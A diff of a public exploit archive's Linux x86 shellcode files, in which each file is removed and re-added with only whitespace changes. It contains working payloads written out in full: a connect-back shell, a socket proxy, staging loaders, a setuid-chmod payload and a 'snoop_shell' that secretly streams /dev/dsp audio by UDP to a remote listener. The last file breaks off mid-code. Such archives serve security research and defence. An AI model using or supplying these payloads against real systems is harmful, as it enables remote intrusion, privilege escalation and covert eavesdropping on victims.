@@ -1,65 +1,65 @@ -/* - * (linux/x86) cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes - * - izik - */ - -char shellcode[] = - - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e - "\x68\x2f\x75\x72\x61" // push $0x6172752f - "\x68\x2f\x64\x65\x76" // push $0x7665642f - "\x89\xe3" // mov %esp,%ebx - "\xb1\x02" // mov $0x2,%cl - - // - // <_openit>: - // - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x99" // cltd - "\xcd\x80" // int $0x80 - "\x96" // xchg %eax,%esi - "\x5f" // pop %edi - "\x5d" // pop %ebp - "\x5d" // pop %ebp - "\x68\x73\x6f\x6c\x65" // push $0x656c6f73 - "\x68\x2f\x63\x6f\x6e" // push $0x6e6f632f - "\x57" // push %edi - "\xe2\xe9" // loop <_openit> - - "\x89\xc3" // mov %eax,%ebx - - // - // <_makeio>: - // - - "\xb2\x04" // mov $0x4,%dl - "\x89\xe1" // mov %esp,%ecx - - // - // <_pre_ioloop>: - // - - "\xb0\x03" // mov $0x3,%al - "\xf8" // clc - - // - // <_ioloop>: - // - - "\xcd\x80" // int $0x80 - "\x87\xde" // xchg %ebx,%esi - "\x72\xf7" // jc <_pre_ioloop> - "\xf9" // stc - "\xeb\xf7"; // jmp <_ioloop> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) cat /dev/urandom > /dev/console, no real profit just for kicks - 63 bytes + * - izik + */ + +char shellcode[] = + + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e + "\x68\x2f\x75\x72\x61" // push $0x6172752f + "\x68\x2f\x64\x65\x76" // push $0x7665642f + "\x89\xe3" // mov %esp,%ebx + "\xb1\x02" // mov $0x2,%cl + + // + // <_openit>: + // + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x99" // cltd + "\xcd\x80" // int $0x80 + "\x96" // xchg %eax,%esi + "\x5f" // pop %edi + "\x5d" // pop %ebp + "\x5d" // pop %ebp + "\x68\x73\x6f\x6c\x65" // push $0x656c6f73 + "\x68\x2f\x63\x6f\x6e" // push $0x6e6f632f + "\x57" // push %edi + "\xe2\xe9" // loop <_openit> + + "\x89\xc3" // mov %eax,%ebx + + // + 
// <_makeio>: + // + + "\xb2\x04" // mov $0x4,%dl + "\x89\xe1" // mov %esp,%ecx + + // + // <_pre_ioloop>: + // + + "\xb0\x03" // mov $0x3,%al + "\xf8" // clc + + // + // <_ioloop>: + // + + "\xcd\x80" // int $0x80 + "\x87\xde" // xchg %ebx,%esi + "\x72\xf7" // jc <_pre_ioloop> + "\xf9" // stc + "\xeb\xf7"; // jmp <_ioloop> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13401.c b/platforms/lin_x86/shellcode/13401.c index 564fac004..539c6446c 100755 --- a/platforms/lin_x86/shellcode/13401.c +++ b/platforms/lin_x86/shellcode/13401.c 
@@ -1,51 +1,51 @@ -/*---------------------------------------------------------------------------* - * 90 byte Connect Back shellcode * - * by Russell Sanford - xort@tty64.org * - *---------------------------------------------------------------------------* - * filename: x86-linux-connect-back.c * - * info: Compiled with DTP Project. * - * discription: This is a x86-linux connect back shellcode. Just invoke * - * the function patchcode() before using shellcode. The format * - * for invoking patchcode is as follows: * - * * - * patchcode(shellcode,"11.22.33.44",31337); * - *---------------------------------------------------------------------------*/ - -char shellcode[] = -"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" -" xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" -"\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" -"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" -"\xcd\x80\xeb\xfe"; - -int find_safe_offset(int INT_A) { - - int INT_B=0; - - do { - INT_A -= 0x01010101; INT_B += 0x01010101; - } - while ( ((INT_A & 0x000000ff) == 0) || - ((INT_A & 0x0000ff00) == 0) || - ((INT_A & 0x00ff0000) == 0) || - ((INT_A & 0xff000000) == 0) ); - - return INT_B; -} - -void patchcode(char *shellcode, char *IP, int PORT) { - - int IP_A = inet_addr(IP); - int IP_B = find_safe_offset(IP_A); - - int PORT_A = ((ntohs(PORT) << 16) + 2); - int PORT_B = find_safe_offset(PORT_A); - - *(int *)&shellcode[19] = (IP_A - IP_B); - *(int *)&shellcode[26] = IP_B; - - *(int *)&shellcode[31] = (PORT_A - PORT_B); - *(int *)&shellcode[38] = PORT_B; -} - +/*---------------------------------------------------------------------------* + * 90 byte Connect Back shellcode * + * by Russell Sanford - xort@tty64.org * + *---------------------------------------------------------------------------* + * filename: x86-linux-connect-back.c * + * info: Compiled with DTP Project. 
* + * discription: This is a x86-linux connect back shellcode. Just invoke * + * the function patchcode() before using shellcode. The format * + * for invoking patchcode is as follows: * + * * + * patchcode(shellcode,"11.22.33.44",31337); * + *---------------------------------------------------------------------------*/ + +char shellcode[] = +"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" +" xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" +"\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" +"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" +"\xcd\x80\xeb\xfe"; + +int find_safe_offset(int INT_A) { + + int INT_B=0; + + do { + INT_A -= 0x01010101; INT_B += 0x01010101; + } + while ( ((INT_A & 0x000000ff) == 0) || + ((INT_A & 0x0000ff00) == 0) || + ((INT_A & 0x00ff0000) == 0) || + ((INT_A & 0xff000000) == 0) ); + + return INT_B; +} + +void patchcode(char *shellcode, char *IP, int PORT) { + + int IP_A = inet_addr(IP); + int IP_B = find_safe_offset(IP_A); + + int PORT_A = ((ntohs(PORT) << 16) + 2); + int PORT_B = find_safe_offset(PORT_A); + + *(int *)&shellcode[19] = (IP_A - IP_B); + *(int *)&shellcode[26] = IP_B; + + *(int *)&shellcode[31] = (PORT_A - PORT_B); + *(int *)&shellcode[38] = PORT_B; +} + // milw0rm.com [2005-12-28] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13402.c b/platforms/lin_x86/shellcode/13402.c index 3e594265a..fca3143e2 100755 --- a/platforms/lin_x86/shellcode/13402.c +++ b/platforms/lin_x86/shellcode/13402.c 
@@ -1,71 +1,71 @@ -/*---------------------------------------------------------------------------* - * 372 byte socket-proxy shellcode * - * by Russell Sanford - xort@tty64.org * - *---------------------------------------------------------------------------* - * filename: x86-linux-bounce-proxy.c * - * date: 12/23/2005 * - * info: Compiled with DTP Project. * - * discription: This is a x86-linux proxy shellcode. This is probably best * - * used in stage 2 situations. The syntax for invoking the * - * patchcode is as follows: * - * * - * patchcode(shellcode,31337,"11.22.33.44",80); * - * * - * Where 31337 is the port to listen to on the remote host * - *---------------------------------------------------------------------------*/ - -char shellcode[] = -"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd" -"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea" -"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01" -"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0" -"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b" -"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89" -"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89" -"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0" -"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1" -"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8" -"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2" -"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff" 
-"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c" -"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c" -"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88"; - -int find_safe_offset(int INT_A) { - - int INT_B=0; - - do { - INT_A -= 0x01010101; INT_B += 0x01010101; - } - while ( ((INT_A & 0x000000ff) == 0) || - ((INT_A & 0x0000ff00) == 0) || - ((INT_A & 0x00ff0000) == 0) || - ((INT_A & 0xff000000) == 0) ); - - return INT_B; -} - -void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) { - - int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2); - int PORT_IN_B = find_safe_offset(PORT_IN_A); - - int IP_A = inet_addr(IP); - int IP_B = find_safe_offset(IP_A); - - int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2); - int PORT_OUT_B = find_safe_offset(PORT_OUT_A); - - *(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B); - *(int *)&shellcode[141] = PORT_IN_B; - - *(int *)&shellcode[205] = (IP_A - IP_B); - *(int *)&shellcode[212] = IP_B; - - *(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B); - *(int *)&shellcode[224] = PORT_OUT_B; - -} - +/*---------------------------------------------------------------------------* + * 372 byte socket-proxy shellcode * + * by Russell Sanford - xort@tty64.org * + *---------------------------------------------------------------------------* + * filename: x86-linux-bounce-proxy.c * + * date: 12/23/2005 * + * info: Compiled with DTP Project. * + * discription: This is a x86-linux proxy shellcode. This is probably best * + * used in stage 2 situations. 
The syntax for invoking the * + * patchcode is as follows: * + * * + * patchcode(shellcode,31337,"11.22.33.44",80); * + * * + * Where 31337 is the port to listen to on the remote host * + *---------------------------------------------------------------------------*/ + +char shellcode[] = +"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd" +"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea" +"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01" +"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0" +"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b" +"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89" +"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89" +"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0" +"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1" +"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8" +"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2" +"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff" +"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c" +"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c" +"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88"; + +int find_safe_offset(int INT_A) { + + int INT_B=0; + + do { + INT_A -= 0x01010101; INT_B += 0x01010101; + } + while ( ((INT_A & 0x000000ff) == 0) || + ((INT_A & 0x0000ff00) == 0) || + ((INT_A & 0x00ff0000) == 0) || + ((INT_A & 
0xff000000) == 0) ); + + return INT_B; +} + +void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) { + + int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2); + int PORT_IN_B = find_safe_offset(PORT_IN_A); + + int IP_A = inet_addr(IP); + int IP_B = find_safe_offset(IP_A); + + int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2); + int PORT_OUT_B = find_safe_offset(PORT_OUT_A); + + *(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B); + *(int *)&shellcode[141] = PORT_IN_B; + + *(int *)&shellcode[205] = (IP_A - IP_B); + *(int *)&shellcode[212] = IP_B; + + *(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B); + *(int *)&shellcode[224] = PORT_OUT_B; + +} + // milw0rm.com [2005-12-28] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13403.c b/platforms/lin_x86/shellcode/13403.c index 4d3b3e035..4e215c583 100755 --- a/platforms/lin_x86/shellcode/13403.c +++ b/platforms/lin_x86/shellcode/13403.c 
@@ -1,29 +1,29 @@ -/* dup2_loop-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I usually combine this with an execve as the second - * stage of a read() jmp *%esp - */ -char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */ -"\x31\xc9" // xor %ecx,%ecx -"\x56" // push %esi -"\x5b" // pop %ebx -// loop: -"\x6a\x3f" // push $0x3f -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x41" // inc %ecx -"\x80\xf9\x03" // cmp $0x3,%cl -"\x75\xf5" // jne 80483e8 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* dup2_loop-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I usually combine this with an execve as the second + * stage of a read() jmp *%esp + */ +char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */ +"\x31\xc9" // xor %ecx,%ecx +"\x56" // push %esi +"\x5b" // pop %ebx +// loop: +"\x6a\x3f" // push $0x3f +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x41" // inc %ecx +"\x80\xf9\x03" // cmp $0x3,%cl +"\x75\xf5" // jne 80483e8 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13404.c b/platforms/lin_x86/shellcode/13404.c index 81af107ab..90748d5b6 100755 --- a/platforms/lin_x86/shellcode/13404.c +++ b/platforms/lin_x86/shellcode/13404.c 
@@ -1,54 +1,54 @@ -/* h3ll-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I use it as a first stage payload when I desire to - * follow up with a real large payload of goodness. This actually - * is a bit larger than necessary because of the error checking but - * in some cases prooves nice. For a tiny version of the same theme - * check out mcb's 14 byte (saving of 15 bytes for all you - * mathematician's out there ;). The only problem might be that his - * reads from stdin and can only reads 385 bytes less than mine. So - * If you like to go big on the shellcode use mine... otherwise here's - * mcb's (or comment out the delimited lines below to shrink mine): - * - * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4" - * - * I assume the file descriptor is in %esi. Since that's where it - * was on the last exploit I wrote. Change the instruction to - * the appropriate register from your fndsckcode or put an int in - * there for and fd that's always the same. 
- */ -char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */ -// uncomment the following line to raise SIGTRAP in gdb -// "\xcc" // int3 -// 22 bytes: -// if (read(fd,buf,512) <= 0x2) _exit(1) else buf(); -"\x31\xdb" // xor %ebx,%ebx -"\xf7\xe3" // mul %ebx -"\x42" // inc %edx -"\xc1\xe2\x09" // shl $0x9,%edx -"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi) -"\x04\x03" // add $0x3,%al -"\x54" // push %esp -"\x59" // pop %ecx -"\xcd\x80" // int $0x80 -"\x3c\x02" // cmp $0x02,%al // (optional error check) -"\x7e\x02" // jle exit // (optional exit clean) -"\xff\xe1" // jmp *%ecx -// 7 bytes _exit(1) (optional _exit(1);) -"\x31\xc0" // xor %eax,%eax -"\x40" // inc %eax -"\x89\xc3" // mov %eax,%ebx -"\xcd\x80" // int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* h3ll-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I use it as a first stage payload when I desire to + * follow up with a real large payload of goodness. This actually + * is a bit larger than necessary because of the error checking but + * in some cases prooves nice. For a tiny version of the same theme + * check out mcb's 14 byte (saving of 15 bytes for all you + * mathematician's out there ;). The only problem might be that his + * reads from stdin and can only reads 385 bytes less than mine. So + * If you like to go big on the shellcode use mine... otherwise here's + * mcb's (or comment out the delimited lines below to shrink mine): + * + * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4" + * + * I assume the file descriptor is in %esi. Since that's where it + * was on the last exploit I wrote. 
Change the instruction to + * the appropriate register from your fndsckcode or put an int in + * there for and fd that's always the same. + */ +char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */ +// uncomment the following line to raise SIGTRAP in gdb +// "\xcc" // int3 +// 22 bytes: +// if (read(fd,buf,512) <= 0x2) _exit(1) else buf(); +"\x31\xdb" // xor %ebx,%ebx +"\xf7\xe3" // mul %ebx +"\x42" // inc %edx +"\xc1\xe2\x09" // shl $0x9,%edx +"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi) +"\x04\x03" // add $0x3,%al +"\x54" // push %esp +"\x59" // pop %ecx +"\xcd\x80" // int $0x80 +"\x3c\x02" // cmp $0x02,%al // (optional error check) +"\x7e\x02" // jle exit // (optional exit clean) +"\xff\xe1" // jmp *%ecx +// 7 bytes _exit(1) (optional _exit(1);) +"\x31\xc0" // xor %eax,%eax +"\x40" // inc %eax +"\x89\xc3" // mov %eax,%ebx +"\xcd\x80" // int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13405.c b/platforms/lin_x86/shellcode/13405.c index 2dc9e85dd..7ba63b455 100755 --- a/platforms/lin_x86/shellcode/13405.c +++ b/platforms/lin_x86/shellcode/13405.c 
@@ -1,23 +1,23 @@ -/* exit-core.c by Charles Stevenson - * - * I made this as a chunk you can paste in to make modular remote - * exploits. I use it when I need a process to exit cleanly. - */ -char hellcode[] = /* _exit(1); linux/x86 by core */ -// 7 bytes _exit(1) ... 'cause we're nice >:) by core -"\x31\xc0" // xor %eax,%eax -"\x40" // inc %eax -"\x89\xc3" // mov %eax,%ebx -"\xcd\x80" // int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte _exit(1); linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* exit-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I use it when I need a process to exit cleanly. + */ +char hellcode[] = /* _exit(1); linux/x86 by core */ +// 7 bytes _exit(1) ... 'cause we're nice >:) by core +"\x31\xc0" // xor %eax,%eax +"\x40" // inc %eax +"\x89\xc3" // mov %eax,%ebx +"\xcd\x80" // int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte _exit(1); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13406.c b/platforms/lin_x86/shellcode/13406.c index ab9e97c63..42885b889 100755 --- a/platforms/lin_x86/shellcode/13406.c +++ b/platforms/lin_x86/shellcode/13406.c 
@@ -1,39 +1,39 @@ -/* readnchmod-core.c by Charles Stevenson - * - * Example of strace output if you pass in "/bin/sh\x00" - * read(0, "/bin/sh\0", 2541) = 8 - * chmod("/bin/sh", 04755) = 0 - * - * Any file path can be given. For example: /tmp/.sneakyguy - * The only caveat is that the string must be NULL terminated. - * This shouldn't be a problem. For multi-stage payloads send - * in this first and then you can send it data with null bytes. - * I made this for rare cases with tight space contraints and - * where read() jmp *%esp is not practical. - * - */ -char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */ -"\x31\xdb"// xor %ebx,%ebx -"\xf7\xe3"// mul %ebx -"\x53"// push %ebx -"\xb6\x09"// mov $0x9,%dh -"\xb2\xed"// mov $0xed,%dl -"\x89\xe1"// mov %esp,%ecx -"\xb0\x03"// mov $0x3,%al -"\xcd\x80"// int $0x80 -"\x89\xd1"// mov %edx,%ecx -"\x89\xe3"// mov %esp,%ebx -"\xb0\x0f"// mov $0xf,%al -"\xcd\x80"// int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* readnchmod-core.c by Charles Stevenson + * + * Example of strace output if you pass in "/bin/sh\x00" + * read(0, "/bin/sh\0", 2541) = 8 + * chmod("/bin/sh", 04755) = 0 + * + * Any file path can be given. For example: /tmp/.sneakyguy + * The only caveat is that the string must be NULL terminated. + * This shouldn't be a problem. For multi-stage payloads send + * in this first and then you can send it data with null bytes. + * I made this for rare cases with tight space contraints and + * where read() jmp *%esp is not practical. 
+ * + */ +char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */ +"\x31\xdb"// xor %ebx,%ebx +"\xf7\xe3"// mul %ebx +"\x53"// push %ebx +"\xb6\x09"// mov $0x9,%dh +"\xb2\xed"// mov $0xed,%dl +"\x89\xe1"// mov %esp,%ecx +"\xb0\x03"// mov $0x3,%al +"\xcd\x80"// int $0x80 +"\x89\xd1"// mov %edx,%ecx +"\x89\xe3"// mov %esp,%ebx +"\xb0\x0f"// mov $0xf,%al +"\xcd\x80"// int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13408.c b/platforms/lin_x86/shellcode/13408.c index 4af7dfd8d..e9aace862 100755 --- a/platforms/lin_x86/shellcode/13408.c +++ b/platforms/lin_x86/shellcode/13408.c 
@@ -1,160 +1,160 @@ -/* Placed the listener here http://www.milw0rm.com/down.php?id=1293 /str0ke */ - -/******************************************************************** - hey folks, this is snoop_shell, short and simply it snoops on - /dev/dsp and after attempting to lower the audio quality - will stream any data read on this device over a udp stream - to a remote listening client.. (source should be available at stonedcoder.org) - - the port that this will stream on is whatever the high half - of the ip address is, i figured this will always be over 1024 - so the client will be usable without root privs. - - at 172 bytes, its really bloated for shellcode, but if your - reading this anyway, you probably are just looking to have fun - with it.. - - remember you'll need to change the ip address before you - actually use it.. and if your unlucky enough to have an - ip address that contains a null.. well.. its on you to fix it.. - but you can do that by simply rotating the ipaddress by a bit or - two.. 
- - mov $0xE8015180,%ebx #192.168.0.116 - ror %ebx #shift right by one bit - - no more null - - - phar[at]stonedcoder[dot]org -*********************************************************************/ - - -char shellcode[] = -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx # \x00 -"\x68\x2f\x64\x73\x70" //push $0x7073642f # /dsp -"\x68\x2f\x64\x65\x76" //push $0x7665642f # /dev -"\x89\xe3" //mov %esp,%ebx -"\x89\xc8" //mov %ecx,%eax -"\xb1\x02" //mov $0x2,%cl -"\xb0\x05" //mov $0x5,%al -"\xcd\x80" //int $0x80 #open /dev/dsp for reading - -"\x89\xc6" //mov %eax,%esi #preserve fd in esi - -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x31\xdb" //xor %ebx,%ebx -"\xb3\x02" //mov $0x2,%bl -"\x53" //push %ebx -"\x53" //push %ebx -"\x4b" //dec %ebx -"\x89\xe1" //mov %esp,%ecx -"\x89\xd8" //mov %ebx,%eax -"\xb0\x66" //mov $0x66,%al -"\xcd\x80" //int $0x80 #create a udp socket - -"\x89\xc7" //mov %eax,%edi #preserve socket in edi - -"\xc1\xc3\x04" //rol $0x4,%ebx -"\x53" //push %ebx -"\x89\xe2" //mov %esp,%edx -"\xb9\x05\x50\x04\xc0" //mov $0xc0045005,%ecx -"\x89\xf3" //mov %esi,%ebx -"\xb0\x36" //mov $0x36,%al -"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_BITS (16 bits per samle) - -"\xfe\xc0" //inc %al -"\x89\x04\x24" //mov %eax,(%esp) -"\xfe\xc1" //inc %cl -"\xb0\x36" //mov $0x36,%al -"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_CHANNELS (1 channel) - -"\xfe\xc0" //inc %al -"\xc1\xc0\x0d" //rol $0xd,%eax -"\x89\x04\x24" //mov %eax,(%esp) -"\xc1\xc8\x04" //ror $0x8,%eax -"\xb1\x02" //mov $0x2,%cl -"\xb0\x36" //mov $0x36,%al #ioctl on fd SOUND_PCM_WRITE_RATE (8khz) -"\xcd\x80" //int $0x80 - -"\x50" //push %eax -"\x50" //push %eax -"\x89\xc2" //mov %eax,%edx - -/* prepare an area on the stack that looks like an struct in_addr */ - /*your ipv4 ip address*/ -"\xbb" "\xc0\xa8\x0f\x2e" //mov $0x7401a8c0,%ebx #your ipaddress would go here currently set to 192.168.1.116 -"\x53" //push %ebx -"\xc1\xe3\x10" //shl $0x10,%ebx -"\xb3\x02" //mov $0x2,%bl -"\x53" //push 
%ebx #port and family, (we'll use use the hi half of the address for a port) - -/* allocate 1025 byte buffer on the stack */ -"\x89\xe3" //mov %esp,%ebx -"\x66\xba\x01\x04" //mov $0x401,%dx #create the space on the stack (1025 bytes) -"\x29\xd4" //sub %edx,%esp - -"\x89\xe0" //mov %esp,%eax -"\x31\xc9" //xor %ecx,%ecx -"\xb1\x10" //mov $0x10,%cl -"\x51" //push %ecx -"\x53" //push %ebx -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x52" //push %edx -"\x50" //push %eax -"\x57" //push %edi -"\x89\xc2" //mov %eax,%edx -"\x89\xcb" //mov %ecx,%ebx -"\x89\xc8" //mov %ecx,%eax -"\x89\xe1" //mov %esp,%ecx -"\xb3\x0b" //mov $0xb,%bl -"\xb0\x66" //mov $0x66,%al -"\x51" //push %ecx -"\x89\xe7" //mov %esp,%edi #registers and stack are prepared for call to sendto -"\x60" //pusha #push regs onto stack - -"\x89\xf3" //mov %esi,%ebx -"\x89\xd1" //mov %edx,%ecx 